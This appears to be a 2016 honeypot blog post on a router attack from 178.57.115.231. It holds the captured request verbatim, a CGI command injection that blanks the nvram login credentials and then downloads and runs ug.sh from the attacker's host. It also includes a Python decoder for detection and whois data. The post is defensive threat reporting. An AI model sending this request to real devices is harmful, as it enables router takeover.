Sunday, 7 February 2016

178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081

BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080

 END OF DATA
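
To make the captured request easier to read, this added example (not part of the original post) undoes the `$IFS` and backslash obfuscation and lists the chained commands, the download URL and the nvram keys the request names. The request line is copied from the capture above; the function names are assumptions of this example.

```python
import re

# Request line copied from the honeypot capture above (the page's own data).
REQUEST_LINE = (
    r"GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;"
    r"nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;"
    r"wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;"
    r"chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0"
)

# $IFS or ${IFS}: expands to whitespace in a shell, so no literal space is needed.
IFS_RE = re.compile(r"\$(?:\{IFS\}|IFS(?![A-Za-z0-9_]))")


def split_request_line(line):
    """Split on the first and last space only; the target itself may contain spaces."""
    method, rest = line.split(" ", 1)
    target, version = rest.rsplit(" ", 1)
    return method, target, version


def decode_commands(target):
    """Return the shell commands chained with ';' in the target, made readable."""
    commands = []
    for part in target.split(";")[1:]:      # part 0 is the CGI path itself
        part = IFS_RE.sub(" ", part)        # $IFS -> the space it stands for
        part = part.replace("\\", "")       # backslashes only escape the next char
        part = " ".join(part.split())       # collapse runs of whitespace
        if part:
            commands.append(part)
    return commands


def summarize(line):
    """Detection verdict plus the indicators a responder would pivot on."""
    method, target, _ = split_request_line(line)
    commands = decode_commands(target)
    joined = "\n".join(commands)
    return {
        "suspicious": bool(IFS_RE.search(target)) and ";" in target,
        "commands": commands,
        "urls": re.findall(r"https?://\S+", joined),
        "nvram_keys": re.findall(r"^nvram set (\w+)", joined, re.M),
    }


if __name__ == "__main__":
    for key, value in summarize(REQUEST_LINE).items():
        print(key, "=", value)
```

The `chmod` mode argument and the `sleep` argument are kept exactly as they appear in the capture; the decoder does not guess at what the original bytes were.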

The ug.sh script tries to download a binary file.

Judging from the xxd and strings output of the file, it looks like a DD-WRT firmware file.


Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer: This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided at your own risk;
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
